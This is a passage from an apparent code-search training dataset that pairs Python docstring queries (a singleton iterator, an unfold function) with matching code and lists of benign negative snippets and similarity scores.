0\n while True:\n response = func(*args, **kwargs)\n if response.status_code in range(200, 300):\n return response\n elif response.status_code >= 500:\n if count == self.retry_count:\n return response\n else:\n time.sleep(pow(2, count))\n count += 1\n continue\n else:\n return response\n\n return wrapped_func", "def intercept(iterable, function):\n\n def intercepting(iterable_):\n for item in iterable_:\n function(item)\n yield item\n\n return intercepting(iterable)", "def cotakewhile(function, iterator):\n results = []\n\n def checkTake(shouldTake, item):\n if shouldTake == True:\n results.append(item)\n return item\n\n def dotake(item):\n d = maybeDeferred(function, item)\n d.addCallback(checkTake, item)\n return d\n\n def dostop(takeResult):\n return takeResult is None\n\n cfc = _CoFunCaller(resultCollector=dotake, stopFunction=dostop)\n return cfc.coiterate(iterator).addCallback(lambda _: results)", "def stop(x=None):\n raise StopIteration(x)", "def threadsafe_generator(f):\n\n def g(*a, **kw):\n return ThreadsafeIter(f(*a, **kw))\n\n return g", "def wait_for(predicate_func, **kwargs):\n if len(kwargs) == 0:\n while not predicate_func():\n pass\n else:\n while not predicate_func(**kwargs):\n pass", "def foreach(func, iterable):\n\n\tfor x in iterable:\n\t\tfunc(x)", "def __call__(self, input=None): # pragma: no cover\n while False:\n yield None", "def call_async(self, func, *args: Any, **kwargs: Any): # type: ignore[no-untyped-def]\n\n @gen.coroutine\n def wrapped(): # type: ignore[no-untyped-def]\n ret = None\n\n self.before_call(func, *args, **kwargs)\n for listener in self._breaker.listeners:\n listener.before_call(self._breaker, func, *args, **kwargs)\n\n try:\n ret = yield func(*args, **kwargs)\n if isinstance(ret, types.GeneratorType):\n raise gen.Return(self.generator_call(ret))\n\n except BaseException as e:\n self._handle_error(e)\n else:\n self._handle_success()\n raise gen.Return(ret)\n\n return wrapped()", "def do(self, function, args):\n self.continue_event.clear()\n function(*args)\n self.continue_event.wait()", "def 
infinite_increment():\n i = 0\n while 1:\n yield i\n i += 1", "def run(self, func, *args, **kwargs):\n try:\n ret = func(*args, **kwargs)\n\n if not self._should_handle_return(ret, *args, **kwargs):\n return ret\n except Exception as e:\n if not self._should_handle_error(e, *args, **kwargs):\n raise\n\n if self._on_delay is None:\n raise MaxRetryError('Maximum number of retries exceeded for {0}'.format(self._get_func_name(func)))\n\n retries = 0\n for delay in self._get_delay_sequence(*args, **kwargs):\n retries += 1\n\n if self._should_handle_retry(False):\n self._call_with_sig(self._on_retry, self._sig_retry, (delay, retries), *args, **kwargs)\n\n sleep(delay / 1000)\n\n if self._should_handle_retry(True):\n self._call_with_sig(self._on_retry, self._sig_retry, (delay, retries), *args, **kwargs)\n\n try:\n ret = func(*args, **kwargs)\n\n if not self._should_handle_return(ret, *args, **kwargs):\n return ret\n except Exception as e:\n if not self._should_handle_error(e, *args, **kwargs):\n raise\n\n raise MaxRetryError('Maximum number of retries exceeded for {0}'.format(self._get_func_name(func)))", "def process_list(_func, iterator, *args, **kwargs):\n return [_func(i, *args, **kwargs) for i in iterator]", "def sequence_side_effect(*args):\n seq = list(args)\n\n def rv_fun(*args, **kw):\n return seq.pop(0)\n return rv_fun", "def next ( num = 1 ) :\n return run ( num )", "def threadsafe_generator(f):\n def g(*a, **kw):\n return threadsafe_iter(f(*a, **kw))\n\n return g", "def threadsafe_generator(f):\n def g(*a, **kw):\n return threadsafe_iter(f(*a, **kw))\n return g", "def threadsafe_generator(f):\n def g(*a, **kw):\n return threadsafe_iter(f(*a, **kw))\n return g", "def threadsafe_generator(f):\n def g(*a, **kw):\n return threadsafe_iter(f(*a, **kw))\n return g", "def threadsafe_generator(f):\n def g(*a, **kw):\n return threadsafe_iter(f(*a, **kw))\n return g", "def threadsafe_generator(f):\n def g(*a, **kw):\n return threadsafe_iter(f(*a, **kw))\n return g", "def threadsafe_generator(f):\n def g(*a, **kw):\n return threadsafe_iter(f(*a, **kw))\n return g", "def threadsafe_generator(f):\n def g(*a, **kw):\n return threadsafe_iter(f(*a, **kw))\n return g", "def forever():\n\n def animate(thing):\n thing = list(thing)\n yield from repeat(thing)\n return animate", "def threadsafe_generator(f):\n\n def g(*a, **kw):\n return threadsafe_iter(f(*a, **kw))\n\n return g", "def call_repeatedly(interval, function, args):\n stopped = threading.Event()\n\n def loop():\n while not stopped.wait(interval):\n function(**args)\n\n threading.Thread(target=loop).start()\n\n # return the thread closing handle\n return stopped.set", "def eager_map(func, iterable):\n for _ in map(func, iterable):\n continue", "def page(fn, args, cursor_key='max_id', get_cursor=lambda r: r.get('next_max_id'), wait=5):\n results = fn(**args)\n yield results\n\n cursor = get_cursor(results)\n while cursor:\n if wait:\n time.sleep(wait)\n args[cursor_key] = cursor\n results = fn(**args)\n yield results\n cursor = get_cursor(results)", "def cycle(f1, f2, f3):\n def how_many(n):\n def what(x):\n if n >= 1:\n x = f1(x)\n if n >= 2:\n x = f2(x)\n if n >= 3:\n x = f3(x)\n if n > 3:\n return how_many(n - 3)(x)\n else:\n return x\n return what\n return how_many", "def run_epochs(self,\n fn: Callable[..., Optional[Dict[str, Any]]],\n data_generator: Iterable[ArrayTupleOrList],\n limit: Optional[int] = None,\n count: Optional[int] = None,\n metrics: Union[Sequence[str], type(ALL)] = NOT_SET,\n excludes: Sequence[str] = ()\n ) -> None:\n g = 
self.iter_epochs(limit=limit, count=count)\n try:\n for _ in g:\n self.run_batches(\n fn, data_generator, metrics=metrics, excludes=excludes)\n finally:\n g.close()", "def _trampoline_private(func):\n while callable(func):\n func = func()\n return func", "def call_orig_func(func, *args, **kwargs):\n return func(*args, **kwargs)", "def try_hard(fun, *args, **kwargs):\n # type: (Callable, *Any, **Any) -> Any\n warnings.simplefilter('always', UserWarning)\n try_hard_limit = -1\n if kwargs is not None:\n if 'try_hard_limit' in kwargs.keys():\n try_hard_limit = kwargs['try_hard_limit']\n del kwargs['try_hard_limit']\n\n msg = None\n return_value = None\n successful = False\n attempts = 0\n while not successful:\n try:\n return_value = fun(*args, **kwargs)\n successful = True\n except Exception as e:\n attempts += 1\n\n if msg is None:\n msg = 'Had to try again to evaluate: %s(' % fun.__name__ + ', '.join(['%s' % arg for arg in args])\n if kwargs is not None:\n msg += ', '.join(['%s=%s' % (key, value) for key, value in kwargs.items()])\n msg += '). The following exception was raised: \"%s\"' % e.message\n\n if 0 < try_hard_limit <= attempts:\n raise\n else:\n warnings.warn(msg)\n\n return return_value", "def fibonacci(a=1, b=2):\n while True:\n yield a\n a, b = b, b+a" ]
[ "0.7004105", "0.6646999", "0.63588154", "0.633149", "0.6150608", "0.6094851", "0.6073668", "0.59957045", "0.5961045", "0.5894083", "0.5876988", "0.58702266", "0.5862073", "0.58489794", "0.5841767", "0.5814898", "0.57949513", "0.5713033", "0.5708868", "0.57078665", "0.5697791", "0.56956506", "0.5677816", "0.56695217", "0.56593865", "0.56593865", "0.56593865", "0.5604495", "0.55875486", "0.5585913", "0.5576986", "0.5543687", "0.5537169", "0.5537169", "0.5521437", "0.5520357", "0.5511987", "0.5487532", "0.54873186", "0.54551095", "0.5446456", "0.54407173", "0.5433639", "0.54220814", "0.54182994", "0.53821105", "0.5370407", "0.5365031", "0.53563625", "0.5345463", "0.53384566", "0.53175104", "0.5315607", "0.5306357", "0.5298923", "0.52837324", "0.52820754", "0.52790767", "0.5275322", "0.52749217", "0.5274559", "0.5263902", "0.52609855", "0.5252699", "0.5251552", "0.52370155", "0.5227625", "0.5225772", "0.52187204", "0.5213146", "0.5206683", "0.5206262", "0.5191474", "0.5189263", "0.51790124", "0.5177619", "0.51680845", "0.5163011", "0.51583606", "0.5149915", "0.51494586", "0.51492673", "0.5147553", "0.5147553", "0.5147553", "0.5147553", "0.5147553", "0.5147553", "0.5147553", "0.51424974", "0.5141331", "0.511099", "0.5105813", "0.5102432", "0.5095912", "0.50956124", "0.50939536", "0.5087599", "0.5083791", "0.5071413" ]
0.7911098
0
Return iterator with a single object.
def singleton(obj: T, expand: bool = False) -> Iter[T]:
    if expand:
        try:
            yield from obj
        except TypeError:
            pass
    yield obj
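A minimal usage sketch of the function above. Iter and T come from the host library and are not defined in the record, so the stand-in below (singleton_plain) uses plain typing instead; the outputs shown in the comments follow the code as written:

from typing import Any, Iterator

def singleton_plain(obj: Any, expand: bool = False) -> Iterator[Any]:
    # Same control flow as the document's singleton, minus the Iter wrapper.
    if expand:
        try:
            yield from obj   # expand an iterable argument in place
        except TypeError:
            pass             # obj is not iterable: fall through to the plain yield
    yield obj

print(list(singleton_plain(42)))               # [42]
print(list(singleton_plain(42, expand=True)))  # [42] (42 is not iterable)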
{ "objective": { "self": [], "paired": [], "triplet": [ [ "query", "document", "negatives" ] ] } }
[ "def getIter(object):\n iterator = None\n try:\n iterator = iter(object)\n except TypeError:\n pass\n return iterator", "def __next__(self):\n return next(self.iterator)", "def __iter__(self):\n self._first()\n return self", "def __iter__(self):\n return self.next()", "def __next__(self):\n return next(self.iter)", "def __iter__(self):\n return self._next()", "def __iter__(self):\n return self._next()", "def __iter__(self):\n return self._next()", "def one(self):\n self.limit(2)\n u = self.get_cursor()\n u = list(u)\n assert u, \"expected one object\"\n if len(u) > 1:\n assert u, \"expected one object, more than one received\"\n return self.from_(**self.prepare_data(u[0]))", "def next(self):\n if not self._peek_seen:\n self._peek_seen = True\n return self._peek\n try:\n # Object is a generator or iterator.\n return self._iterable.next()\n except AttributeError:\n pass\n try:\n # Object is a list.\n return self._iterable.pop(0)\n except AttributeError:\n pass\n except (AttributeError, IndexError, KeyError, TypeError):\n raise StopIteration\n # Object is not iterable -- treat it as the only item.\n raise StopIteration", "def __next__(self):\n if self._cursor is None:\n raise StopIteration(\"Iterator has not been initialized. Use `iter` first.\")\n\n return self._cursor.next()", "def anyObject(iterable):\n for obj in iterable:\n return obj", "def __iter__(self):\n return self.new_generator()", "def __iter__(self) -> object:\n return self", "def next_object(self):\n if not self._buffer_size():\n return None\n return next(self.delegate)", "def _NextItem(self):\n if self._injected:\n self._injected = False\n return self._injected_value\n try:\n # Object is a generator or iterator.\n return self._iterable.next()\n except AttributeError:\n pass\n except StopIteration:\n self._tap.Done()\n raise\n try:\n # Object is a list.\n return self._iterable.pop(0)\n except (AttributeError, KeyError, TypeError):\n pass\n except IndexError:\n self._tap.Done()\n raise StopIteration\n # Object is not iterable -- treat it as the only item.\n if self._iterable is None or self._stop:\n self._tap.Done()\n raise StopIteration\n self._stop = True\n return self._iterable", "def __iter__(self) -> Iterator[T]:\n return self", "def get_next(self):\n raise NotImplementedError(\"Iterator.get_next()\")", "def next(self):\n try:\n ret = PymongoCursor.next(self)\n except StopIteration:\n self.__fullcache = True\n raise\n self.__itercache.append(ret)\n return ret", "def __next__(self):\n return self.next()", "def __next__(self):\n return self.next()", "def __next__(self):\n return self.next()", "def __iter__(self):\n return self.ListIterator(self.first)", "def Iterator():\n return _table.Iterator()", "def one(self):\n return next(iter(self), None)", "def __iter__(self):\n return iter(range(1, self.size() + 1))", "def __iter__(self):\n # type: () -> Iterator[Any]\n return iter(self[index] for index in range(len(self)))", "def fetchone(self):\n try:\n return next(self._results)\n except StopIteration:\n return None", "def __iter__(self):\n for o in self._iter:\n yield o", "def get_single_result(self):\n for r in self:\n return r", "def __iter__(self):\r\n return self._iterate()", "def __call__(self):\r\n return self.next()", "def next(self) -> List[object]:\n ...", "def __iter__(self):\n cursor = self._front\n while not cursor is None:\n yield cursor.data\n cursor = cursor.next", "def __iter__(self):\n return self", "def __iter__(self):\n return self", "def __iter__(self):\n return self", "def __iter__(self):\n return self", 
"def __iter__(self):\n return self", "def __iter__(self):\n return self", "def __iter__(self):\n return self", "def __iter__(self):\n return self", "def __iter__(self):\n return self", "def __iter__(self):\n return self", "def __iter__(self):\n return self", "def __iter__(self):\n return self", "def __iter__(self):\n return self", "def __iter__(self):\n return self", "def __iter__(self):\n return self", "def __iter__(self):\n return self", "def __iter__(self):\n return self", "def __iter__(self):\n return self", "def __iter__(self):\n return self", "def __iter__(self):\n return self", "def __iter__(self):\n return self", "def __iter__(self):\n return self", "def __iter__(self):\n return iter(self.__iter())", "def __next__(self) :\n\n data = self.cur.fetchone()\n if not data :\n raise StopIteration\n return RowReference(self.desc, data[1:])", "def __next__(self):\n\t\treturn next()", "def __iter__(self):\n cursor = 0\n while cursor < len(self):\n yield self._items[cursor]\n cursor += 1", "def iter(self):\n s = self.first\n while True:\n yield s\n s = s.__next__\n if s == self.first:\n return", "def oneIteration(self):\n\t\traise NotImplementedError", "def __next__(self):\n try:\n t = self.items[self.pos]\n except IndexError:\n raise EOF()\n self.pos += 1\n return t", "def __iter__(self):\r\n return self", "def __iter__(self):\n return self._cursor", "def __iter__(self):\n # Ripped off from elasticutils\n return (self.objects[id] for id in self.ids if id in self.objects)", "def next(self) -> object:\n return self._next", "def __next__(self):\n if(self._isDone()):\n raise StopIteration\n return self._next()", "def __iter__(self):\n\n return self", "def first(self):\n try:\n return self.next()\n except StopIteration:\n return None", "def get_iterator(self, name):\n return self._iterators[name]", "def next(self):\n return type(self).__next__(self)", "def __next__(self):\n \n if self.i == len(self.data):\n raise StopIteration\n item = self.data[self.i]\n self.i += 1\n return item", "def iterator(self):\n yield", "def next(self):\n return self.__next__()", "def next(self):\n return self.__next__()", "def next(self):\n return self.__next__()", "def next(self):\n return self.__next__()", "def next(self):\n return self.__next__()", "def next(self):\n return self.__next__()", "def next(self):\n return self.__next__()", "def _Peek(self):\n try:\n # Object is a generator or iterator.\n return self._iterable.next()\n except AttributeError:\n pass\n except StopIteration:\n self._peek_seen = True\n return None\n try:\n # Object is a list.\n return self._iterable.pop(0)\n except (AttributeError, IndexError, KeyError, TypeError):\n pass\n # Object is not iterable -- treat it as the only item.\n return self._iterable", "def get_iterator(dataset):\n if context.executing_eagerly():\n iterator = dataset_ops.make_one_shot_iterator(dataset)\n else:\n iterator = dataset_ops.make_initializable_iterator(dataset)\n initialize_iterator(iterator)\n return iterator", "def __iter__(self):\n items = self._fetch()\n for item in items:\n yield item", "def __iter__(self):\n cursor=0\n while cursor<len(self):\n yield self._item[cursor].key\n cursor+=1", "def makeiter(obj):\n if not obj:\n return []\n if not isiterable(obj):\n return [obj]\n return obj", "def __iter__(self):\n for item in self._reader:\n yield item", "def __next__(self):\n if self._idx < len(self._rib):\n key_result = self._rib.get_key(self._idx)\n result = self._rib[key_result]\n self._idx += 1\n return result\n\n raise StopIteration", "def __iter__(self) -> 
object:\n return LinkedListIterator(self)", "def __iter__(self):\n return (self.get_node(node_id) for node_id in self._collection.all_keys())", "def __iter__(self):\n return iter(())", "def __next__(self):\n\t\tif self.i >= len(self.l):\n\t\t\tself.i = 0\n\t\t\traise StopIteration\n\t\tresult = self.l[self.i]\n\t\tself.i += 1\n\t\treturn result", "def __iter__(self):\n return iter(self._items)\n # to use a generator, it would look like this...\n # for item in self._items: yield item", "def next(self):\n return _libsbml.SwigPyIterator_next(self)", "def one(self):\n try:\n result = self.next()\n except StopIteration:\n raise ValueError('Less than one result from .one()')\n try:\n self.next()\n except StopIteration:\n return result\n raise ValueError('More than one result from .one()')", "def __iter__(self):\n cursor = self.first()\n while cursor is not None:\n yield cursor.element()\n cursor = self.after(cursor)", "def next(self):\n return next(self.gen)", "def one(self):\n return self._iter().one()", "def __iter__(self) -> Iterator[Batch]:\n return self.get_iterator()", "def next(self):\n nxt = self.readentry()\n if nxt is None:\n raise StopIteration\n return nxt" ]
[ "0.75817907", "0.74081564", "0.7373555", "0.71963745", "0.71724164", "0.7078414", "0.7078414", "0.7078414", "0.6872086", "0.6868703", "0.683738", "0.67541516", "0.665635", "0.66446465", "0.6599324", "0.65719706", "0.65708953", "0.65270007", "0.6459694", "0.64549285", "0.64549285", "0.64549285", "0.64374125", "0.64172226", "0.6414021", "0.6390782", "0.6379818", "0.63587266", "0.6349127", "0.63318557", "0.63298196", "0.6329625", "0.6323944", "0.631983", "0.6317724", "0.6317724", "0.6317724", "0.6317724", "0.6317724", "0.6317724", "0.6317724", "0.6317724", "0.6317724", "0.6317724", "0.6317724", "0.6317724", "0.6317724", "0.6317724", "0.6317724", "0.6317724", "0.6317724", "0.6317724", "0.6317724", "0.6317724", "0.6317724", "0.6317724", "0.6279644", "0.62768555", "0.6275545", "0.62750477", "0.6271484", "0.623421", "0.62187064", "0.6215623", "0.62154925", "0.620671", "0.620216", "0.6186279", "0.61740214", "0.6149473", "0.6149072", "0.61431664", "0.613794", "0.6132762", "0.6124234", "0.6124234", "0.6124234", "0.6124234", "0.6124234", "0.6124234", "0.6124234", "0.6119415", "0.6103079", "0.6090697", "0.60901415", "0.6085427", "0.6080149", "0.60789734", "0.60753465", "0.6065723", "0.60605675", "0.60582924", "0.60565424", "0.6049802", "0.60483974", "0.6041174", "0.6019598", "0.6010882", "0.6006847", "0.6005798" ]
0.6621986
14
Invert a fold. Similar to iterate, but expects a function of seed -> (seed', x). The second value of the tuple is included in the resulting sequence while the first is used to seed func in the next iteration. Stops iteration if func returns None or raises StopIteration.
def unfold(func, seed):
    try:
        elem = func(seed)
        while elem is not None:
            seed, x = elem
            yield x
            elem = func(seed)
    except StopIteration as e:
        yield from stop_seq(e)
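stop_seq is a private helper of the host library (presumably it recovers a payload carried by StopIteration); the runnable sketch below drops that detail but keeps the seed -> (seed', x) protocol the docstring describes:

from typing import Callable, Iterator, Optional, Tuple

def unfold_plain(func: Callable[[int], Optional[Tuple[int, int]]],
                 seed: int) -> Iterator[int]:
    # func maps seed -> (next_seed, value); returning None ends the sequence.
    elem = func(seed)
    while elem is not None:
        seed, x = elem
        yield x
        elem = func(seed)

countdown = lambda n: (n - 1, n) if n > 0 else None
print(list(unfold_plain(countdown, 5)))  # [5, 4, 3, 2, 1]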
{ "objective": { "self": [], "paired": [], "triplet": [ [ "query", "document", "negatives" ] ] } }
[ "def inverse(f):\n return lambda y: search(lambda x: f(x) == y)", "def fold(iterable, func, base):\n acc = base\n for element in iterable:\n acc = func(acc, element)\n return acc", "def foldl(func, start, itr):\n return _foldl(func, start, iter(itr))", "def flip(func):\n if not callable(func):\n raise TypeError(\"First argument to flip must be callable\")\n \n def flipped_func(*args, **kwargs):\n return func(*reversed(args), **kwargs)\n return flipped_func", "def flip(f):\n return lambda *args, **kwargs: f(*args[::-1], **kwargs)", "def inverse(func: Callable):\n @wraps(func)\n def _wrapper(*args, **kwargs):\n return 1.0 / func(*args, **kwargs)\n return _wrapper", "def invert_function(self, qubits):\n\n for qubit in qubits:\n X | qubit", "def foldr(func, start, itr):\n return _foldr(func, start, iter(itr))", "def flip(f: Callable[[A, B], Any]) -> Callable[[B, A], Any]:\n return lambda x, y: f(y, x)", "def flip(f: Callable) -> Callable:\n return curry(lambda *args, **kwargs: f(*reversed(args), **kwargs))", "def foldl2(link, fn, z):\n def step(x, g):\n \"*** YOUR CODE HERE ***\"\n return foldr(link, step, identity)(z)", "def negate_all(f):\r\n return lambda *args, **kwargs: [-y for y in f(*args,**kwargs)]", "def negate_all(f):\n return lambda *args, **kwargs: [-y for y in f(*args, **kwargs)]", "def negate_all(f):\n return lambda *args, **kwargs: [-y for y in f(*args, **kwargs)]", "def _fold_loop(cls, f, agg, next):\n\n while next is not None:\n (val, next) = next\n agg = f(val, agg)\n return agg", "def interleave(inter, f, seq):\n seq = iter(seq)\n try:\n f(next(seq))\n except StopIteration:\n pass\n else:\n for x in seq:\n inter()\n f(x)", "def iterate(func, x):\n while True:\n x = func(x)\n yield x", "def filtern(func: Callable, iterable: Iterable):\n return next(filter(func, iterable))", "def cofold(function, initial, iterator):\n acc = [initial]\n\n def handleAcc(newAcc):\n acc[0] = newAcc\n\n def dofold(item):\n return function(acc[0], item)\n\n d = _CoFunCaller(dofold, resultCollector=handleAcc).coiterate(iterator)\n d.addCallback(lambda _: acc[0])\n return d", "def ifilter_c(func):\n return functools.partial(ifilter, func)", "def _walk_inverse(self, step_fn, y, **kwargs):\n for bij in self._bijectors:\n y = step_fn(bij, y, **kwargs.get(bij.name, {}))\n return y # Now `x`", "def inverse(self, x, *args, **kwargs):\n if self.list_of_inverses is None:\n utils.print_warning(\"inverses were not given\")\n return\n for i in range(len(self.list_of_inverses)):\n x = self.list_of_inverses[i](x, *args, **kwargs)\n return x", "def imap_c(func):\n return functools.partial(imap, func)", "def repeatedly(func, /, *args, **kwargs):\n func = to_callable(func)\n try:\n while True:\n yield func(*args, **kwargs)\n except StopIteration as e:\n yield from stop_seq(e)", "def inverted( self ):\n return self._modifier(\n self,\n lambda x: invert_bits( x, self.nr_of_pins )\n )", "def __iter__(self):\n makeit = getattr(self._data, '__inverted__', self.__next__)\n return makeit()", "def ireduce(f, it):\n acc = it.next()\n yield acc\n for x in it:\n acc = f(acc, x)\n yield acc", "def flipflop(it, state=True):\n for i in it:\n yield (state, i)\n state = not state", "def selfie_depreceated(f):\n return partial(f, f)", "def negate(f):\n return lambda *args, **kwargs: -f(*args, **kwargs)", "def negate(f):\n return lambda *args, **kwargs: -f(*args, **kwargs)", "def foldr(link, fn, z):\n \"*** YOUR CODE HERE ***\"", "def mlift(func):\n return compose(unit, func)", "def negate(f):\r\n return lambda *args, **kwargs: 
-f(*args, **kwargs)", "def inv_inplace(a):", "def ifilter(self, func: Callable[[T], bool]) -> '_[T]':\n return _(filter(func, self.array))", "def inverse(f, a, b, num_iters=64):\n if a >= b:\n raise ValueError(f\"Invalid interval ({a}, {b})\")\n\n def g(y):\n if y > f(b) or y < f(a):\n raise ValueError(f\"Invalid image ({y})\")\n lower = a\n upper = b\n for _ in range(num_iters):\n mid = average(lower, upper)\n if f(mid) < y:\n lower = mid\n elif f(mid) > y:\n upper = mid\n else:\n return mid\n return mid\n\n return g", "def inverse(self):\n cdef StdVectorFst result = self.copy()\n result.invert()\n return result", "def reduce_right(self, func, init=None):\n return self.reverse().reduce(func, init)", "def iterate(func: Callable[..., T], x: T, *args, index: Index = None):\n func = to_callable(func)\n index = to_index_seq(index)\n\n if index is None and not args:\n out = _iterate(func, x)\n elif index is None:\n out = _iterate_n(func, (x, *args))\n else:\n if not args:\n out = _iterate_indexed(func, index, x)\n else:\n out = _iterate_indexed_n(func, index, (x, *args))\n\n return Iter(out)", "def drop_while(coll, func): \n i = 0\n while i < len(coll) and func(coll[i]):\n i += 1\n return coll[i:]", "def twice(func, value):\n return func(func(value))", "def inverse(self, x):\n return self.mul(self.weights, x.unsqueeze(-1)).squeeze(-1) + self.shift\n #return self.mul(torch.inverse(self.weights), (x - self.shift).unsqueeze(-1)).squeeze(-1)", "def erfcinv(a):", "def negate(func: Callable):\n @wraps(func)\n def _wrapper(*args, **kwargs):\n return -func(*args, **kwargs)\n return _wrapper", "def wrapper_fn(*args, **kwargs):\n\n if __enveloop_number_of_loops__[fn.__name__] > 0:\n __enveloop_number_of_loops__[fn.__name__] -= 1\n return fn(*args, **kwargs)\n else:\n del __enveloop_number_of_loops__[fn.__name__]\n if callback:\n return callback(*args, **kwargs)", "def non_step(func):\n assert not hasattr(func, \"_skip_inference\"), \\\n \"Double-wrapped method %r?\" % func\n func._skip_inference = True # pylint: disable=protected-access\n return func", "def lift(func: Callable) -> Callable:\n return lambda f: compose2(func, f)", "def NOT(r):\n return lambda l, i: not r(l, i)", "def iterate(f, x):\n while True:\n yield x\n x = f(x)", "def make_func_repeater(f, x):\n\n def repeat(i, x=x):\n if i == 0:\n return x\n else:\n return repeat(i-1, f(x))\n return repeat", "def filter(self, fn: Callable[[Tuple[K, List[V]]], bool]) -> Iterator[Tuple[K, List[V]]]:\n raise NotImplementedError", "def _inner_preduce(x):\n if len(x) <= 2:\n return _sfn(x)\n paired_x = partition_all(2, x)\n new_x = tuple(pool.map(_sfn, paired_x))\n return _inner_preduce(new_x)", "def test_func_generator_transplant():\n def test_odd(v):\n assert v % 2\n for i in range(0, 4):\n yield test_odd, i", "def test_unwrap_or_else(\n self, start: Result[int, int], fn: t.Callable[[int], int], exp: int\n ) -> None:\n assert start.unwrap_or_else(fn) == exp", "def tensorinv(a, ind=2):\n return TensorInv(ind)(a)", "def lift(f: Callable[..., Data]) -> LiftedFunc:\n def inner(*args: Result) -> Result:\n out = []\n for args1 in itertools.product(*args):\n val = f(*args1)\n out.append(val)\n return out\n return inner", "def filter(iteratee, seq):\n return _filter(fnc.iteratee(iteratee), seq)", "def inverted(values, input_min=0, input_max=1):\n values = _normalize(values)\n if input_min >= input_max:\n raise ValueError('input_min must be smaller than input_max')\n for v in values:\n yield input_min + input_max - v", "def mixrows(self, func=lambda a: 
random().scramble(a)):\n self.a = func(self.a)", "def chained(func):\n def wrapper(*args, **kwargs):\n for xs in func(*args, **kwargs):\n for x in xs:\n yield x\n return wrapper", "def inverse(self, x):\n x = np.asarray(x)\n def r(vec):\n return utils.recycled(vec, as_=x)\n if self.zero is not None and self.multiplier is not None:\n x = x / r(self.multiplier) + r(self.zero)\n elif self.zero is not None:\n x = x + r(self.zero)\n elif self.multiplier is not None:\n x = x / r(self.multiplier)\n return x", "def reduce(self, func, init=None):\n return _(reduce(func, self._, init) if init else reduce(func, self._))", "def apply(cls, func):\n raise NotImplementedError", "def each(self, func):\n\n for i in self._:\n func(i)\n return self", "def remove_if(rng, pred):\n j = 0\n for i, x in enumerate(rng):\n if pred(x):\n continue\n if i != j:\n rng[i], rng[j] = rng[j], rng[i]\n j += 1\n return j", "def filter(iterable, filter_func):\n for item in iterable:\n item = filter_func(item)\n if item is not None:\n yield item", "def foreach(function):\n return partial(map, function)", "def random_seeded(func):\n\n @wraps(func)\n def wrapper(*args, random_seed: int = None, **kwargs):\n _RNG.seed(random_seed)\n return func(*args, **kwargs)\n\n return wrapper", "def inverse(self: T) -> T:", "def zero_state(self, x):\n base_state = super(FoldingInnerOptimizer, self).zero_state(x)\n fold_state = self._init_fold_state_fn(x)\n if not isinstance(fold_state, tf.Tensor):\n raise NotImplementedError('Only tensor `fold_state`s supported')\n return base_state + (fold_state,)", "def generator(func):\n\n @fn\n @wraps(func)\n def gen(*args, **kwargs):\n return Iter(func(*args, **kwargs))\n\n return gen", "def dewindowify(iterable):\n for _, current, _ in iterable:\n yield current", "def cfilter(func,iterable):\n result = []\n\n for i in iterable:\n\n if func(i) == True:\n result.append(i)\n\n return result", "def apply_to_odd_positions(f, xs):\n ys = []\n for i, x in enumerate(xs):\n if i % 2 == 1:\n ys.append(f(x))\n else:\n ys.append(x)\n return ys", "def flip(self, x, y, /, *args, **kwargs):\n return self._func(y, x, *args, **kwargs)", "def invert_inplace(a):", "def compose(*funcs):\n if not funcs:\n return identity\n\n def wrapper(*args, **kwargs):\n fst, *rest = funcs\n ret = fst(*args, **kwargs)\n\n for f in rest:\n ret = f(ret)\n\n return ret\n\n return wrapper", "def imap(self, func: Callable[[T], V]) -> '_[V]':\n return _(map(func, self.array))", "def retrying(func, *retry_args, **retry_kwargs):\n yield retriable(*retry_args, **retry_kwargs)(func)", "def test_func_generator():\n def test_odd(v):\n assert v % 2\n for i in range(0, 4):\n yield test_odd, i", "def call_orig_func(func, *args, **kwargs):\n return func(*args, **kwargs)", "def transform(self, func):\n if func.__code__.co_argcount == 1:\n oldfunc = func\n func = lambda t, rdd: oldfunc(rdd)\n assert func.__code__.co_argcount == 2, \"func should take one or two arguments\"\n\n return KafkaTransformedDStream(self, func)", "def _inv(self) -> None:\n\n self.inv(inplace=True)", "def intercept(iterable, function):\n\n def intercepting(iterable_):\n for item in iterable_:\n function(item)\n yield item\n\n return intercepting(iterable)", "def lift(cls, func):\n raise NotImplementedError", "def mcompose(*mfuncs):\n return functools.partial(foldl, bind, tuple(reversed(mfuncs)))", "def iter_except(cls, func, exception, first=None):\n try:\n if first is not None:\n yield first() # For database APIs needing an initial cast to db.first()\n while True:\n yield func()\n 
except exception:\n pass", "def reduce_my(self, func: Callable[[int, int], int], key: keyType, initial_state: int) -> int:\n iterable = self.get_by_key(key)\n tmp = [] # type: List\n if not isinstance(iterable, list):\n tmp = list([iterable])\n else:\n tmp = iterable\n it = iter(tmp)\n value = initial_state\n for element in it:\n # Support the element with one-dimension list\n if isinstance(element, list):\n for e in element:\n value = func(value, e)\n else:\n value = func(value, element)\n return value", "def check_identity_lazy(func, accumulator):\r\n # Call each function with several arguments, and check that it is\r\n # evaluated only once per argument.\r\n memory = Memory(cachedir=env['dir'], verbose=0)\r\n memory.clear(warn=False)\r\n func = memory.cache(func)\r\n for i in range(3):\r\n for _ in range(2):\r\n yield nose.tools.assert_equal, func(i), i\r\n yield nose.tools.assert_equal, len(accumulator), i + 1", "def eager_map(func, iterable):\n for _ in map(func, iterable):\n continue", "def foreach(func, iterable):\n\n\tfor x in iterable:\n\t\tfunc(x)", "def down_to(self, n, fn):\n for i in range(self._, n, -1):\n fn(i)\n return self", "def filter(self, fn: Callable[[Tuple[K, List[V]]], bool]) -> Iterator[Tuple[K, List[V]]]:\n return (entry for entry in iter(self) if fn(entry))", "def foldl(link, fn, z):\n if link is Link.empty:\n return z\n \"*** YOUR CODE HERE ***\"\n return foldl(______, ______, ______)", "def take_while(coll, func):\n i = 0\n while i < len(coll) and func(coll[i]):\n i += 1\n return coll[:i]", "def not_random(func):\n func.random = False\n return func", "def keep_indexed(f):\n def _keep_indexed_xducer(step):\n outer = {\"idx\": 0}\n def _keep_indexed_step(r=Missing, x=Missing):\n if r is Missing: return step()\n if x is Missing:\n return step(r)\n res = f(outer[\"idx\"], x)\n outer[\"idx\"] += 1\n return step(r, res) if res is not None else r\n return _keep_indexed_step\n return _keep_indexed_xducer", "def iter(space, w_collection_or_callable, w_sentinel=None):\n if w_sentinel is None:\n return space.iter(w_collection_or_callable)\n else:\n return iter_sentinel(space, w_collection_or_callable, w_sentinel)", "def compose(*funcs):\n return reduce(lambda f, g: lambda x: f(g(x)), funcs[::-1])" ]
